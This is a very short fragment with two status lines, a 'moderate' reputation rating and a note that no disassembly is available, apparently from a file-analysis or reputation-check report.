                                Reputation:moderate

                                No disassembly